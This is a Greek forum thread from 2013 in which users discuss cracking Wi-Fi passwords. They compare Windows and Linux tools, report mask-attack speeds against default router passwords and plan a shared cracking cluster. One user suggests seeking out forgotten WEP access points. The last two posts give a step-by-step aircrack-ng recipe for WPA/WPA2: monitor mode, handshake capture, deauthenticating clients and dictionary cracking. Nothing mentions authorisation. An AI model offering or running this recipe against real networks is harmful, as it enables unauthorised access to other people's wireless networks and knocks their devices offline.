biomecanoid Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 Το δοκιμασα το Wireless Security Auditor είναι απλός πιο εύκολο και δεν νομίζω κανεις να κάνει capture το Handshake από τα Windows τώρα, είναι χρήσιμο μονο άμα εxεις το usb adapter Το Distributed Password Recovery είναι ακόμα πιο advanced κάνει και cluster άμα εxεις και δεύτερο pc γιατί χρειάζεται όσο Raw Power μπορείς Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Candlemass Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 Ενημερωτικά, από windows γίνεται sniffing/handshake capture αν υπάρχει ασύρματη κάρτα με chipset Atheros και λοιπά συμβατά και χρησιμοποιηθούν οι drivers του Commview for Wifi για να μπορεί να μπεί η κάρτα σε monitor mode... 1 Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
lexmark Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 Αυτό θα έγραφα τώρα. Βέβαια δεν κάνουν όλα τα Atheros αλλά και πάλι με βολεύει να το δοκιμάσω κάποια στιγμή γιατί βαριέμαι να ξαναπερνάω backtrack στον μικρό Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 Δεν είναι platform τώρα τα windows για αυτή την δουλειά.Η Atheros είναι γνωστό πως κάνει την δουλειά και μπαίνει σε monitor mode γιαυτο και τα περισσότερα netbook είναι ότι πρέπει.Το πρόβλημα δεν είναι πως θα παρεις το Handshake το θέμα είναι τι το κανεις μετά. Οσο για το backtrack εγώ το έχω σε usb και κάνει boot παντού χωρίς θέμα. Άσε που έχω και το Aircrack suite και στο Lubuntu και δεν χρειάζεται καν το Backtrack. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Candlemass Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 Εφόσον η aircrack suite έχει γίνει compiled και για windows, το θέμα είναι τί βολεύει τον καθένα. Ο αποτρεπτικός παράγοντας για τα windows ήταν ότι δεν μπορούσαν να βάλουν την κάρτα σε monitor mode οι drivers και έπρεπε να χρησιμοποιηθούν ειδικοί, brute force και dictionary attack γίνεται από παντού. Βέβαια το commview for wifi κυκλοφορεί χρόνια (απο το 2007 το θυμάμαι), αλλά εφόσον υπήρχε το backtrack με τα πάντα έτοιμα, δεν υπήρχε λόγος να κάτσεις να παιδευτείς με windows. Δεν θέλω να αρχίσω πάλι τις μελοδραματικές αναδρομές () για το WEP και τα απαραίτητα packet injection/forging, που ήταν επίσης αποτρεπτικοί παράγοντες για τα windows. 1 Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 Σε αυτούς του τομείς τα Windows θα είναι 2α αφού πρώτα τέτοια utilities βγαίνουν σε Linux και μετά βρίσκουν το δρομο τους για τα Windows. θα ξεφτιλιστεί το άθλημα άμα αρχίσει και γίνετε και από Windows τώρα. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
lexmark Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 oh well. 42 μέρες για μια απλή mask attack για να βρει ένα νούμερο κινητού. Κάτι μου λέει ότι θα δω και το Distributed Password Recovery που λες biomec. Δεν είναι θέμα «ξεφτύλας». Το μεγαλύτερο πρόβλημα μιας σουίτας, οποιασδήποτε σουίτας, είναι ο περιορισμός στις πλατφόρμες που μπορεί να τρέξει . Αυτό, συν το γεγονός ότι ήθελα κάποια στιγμή να δω που βρίσκονται τα Windows σε αυτόν τον τομέα. Το μόνο σίγουρο, πάντως, είναι ότι δεν υπάρχει πιθανότητα τα Windows να φτάσουν το linux κάποια στιγμή σύντομα. 1 Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 εγώ που έκανα το Default mask 9 νούμερα έκανε κάπου 1h:40 λεπτάσε 4 cores cpu + 2 GPU το EDPR το έχω ψάξει πολλά χρονια τώρα δεν υπάρχει κάτι καλύτερο και δυστυχώς θες cluster για να γίνει η δουλειά.Τα default password συνήθως είναι νούμερα + γράμματα 10 ψηφίαΟποτε οργανωθείτε να κάνουμε cluster έστω και μέσα από το internet δεν θέλει Bandwidth Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
lexmark Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 G630 εδώ με μια ταπεινή GT620 Και το είχα να παίζει μόνο στον ένα πυρήνα Κάποια στιγμή όμως μέσα στο ΣΚ θα κάνω ένα μικρό cluster τοπικά (μπορεί να γίνει, έτσι; Ακόμα δεν έχω δει το EDPR) έχω άλλους 3 και κάθονται - παλιοί βέβαια - να δω τι θα μου δώσει. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 Core Quad + Nvidia 460GT + 9400 onboard o Core quad με cuda στο EDPR ειχε καπου 600 units και ενας P4 100 στήσε μηχανημα άνοιξε ports να κάνουμε cluster άντε έγω δεν μπορώ να ανοίξω ports τώρα 1 Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 6 Ιουνίου 2013 Share Δημοσ. 6 Ιουνίου 2013 έβαλα καινούργια έκδοση του EDPR και από 600 Untis ο Core2Quad τώρα πιάνει 2000 1 Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Silverage Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Πρώτη φορά βλέπω το θέμα αυτό και φαίνεται ενδιαφέρον.Μήπως υπάρχει κάποιος οδηγός για wpa2 cracking; Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Το WPA δεν σπάει θέλει τρελή υπολογιστική δύναμη δηλαδή και έτσι όπως είναι τα PC σήμερα κανένα δεν φτάνει και πρέπει να κανεις computational cluster.Και το WEP είναι ενδιαφέρον υπάρχουν ακόμα ξεχασμένα ΑP σε WΕΡ και άμα δεν πιάνεις κανένα ίσως πρέπει να αύξησης το range που κανεις scan με καλύτερο εξοπλισμό. Mάθε πρώτα το WEP άμα δεν το εxεις μάθει ήδη και μετά πας στο WPA με την σειρά πάνε αυτά 1 Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Πρώτη φορά βλέπω το θέμα αυτό και φαίνεται ενδιαφέρον.Μήπως υπάρχει κάποιος οδηγός για wpa2 cracking; airmon-ng airmon-ng start wlan0 clear airodump-ng mon0 airodump-ng -w WPACap -c (opoio kanali einai) mon0 ''NEW CONSOLE'' aireplay-ng -0 0 -a (router mac) -c (client mac) mon0 ''NEW CONSOLE'' aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst WPACap-01.cap '''PARADEIGMA PROORISMOU''' ειναι για wpa+wpa2....το password.lst ειναι ενα παραδειγμα μπορεις να βαλεις και αλλες λιστες αν διαθετεις απλα δυσκολα εως αδυνατο να εχεις αποτελεσματα...να ξερεις Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 airmon-ng airmon-ng start wlan0 clear airodump-ng mon0 airodump-ng -w WPACap -c (opoio kanali einai) mon0 ''NEW CONSOLE'' aireplay-ng -0 0 -a (router mac) -c (client mac) mon0 ''NEW CONSOLE'' aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst WPACap-01.cap '''PARADEIGMA PROORISMOU''' * ifconfig wlan0 down πρέπει να κανεις down το interface πριν το βάλεις σε Monitor mode γιατί άμα για παράδειγμα είσαι σπίτι σου μόλις άνοιξεις το laptop θα μπει στο WiFi του σπιτιού και θα κλειδώσει σε ένα κανάλι * airodump-ng --encrypt WPA mon0 Για να βρείς μονο τα κλειδωμένα με WPA APs όχι και τα open η τα wep * airodump-ng -w WPACap -c (opoio kanali einai) --bssid mon0 για να παρεις το handshake ΜΟΝΟ του ΑP που θέλεις όχι και κάποιου αλλου μαζί Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Προτεινόμενες αναρτήσεις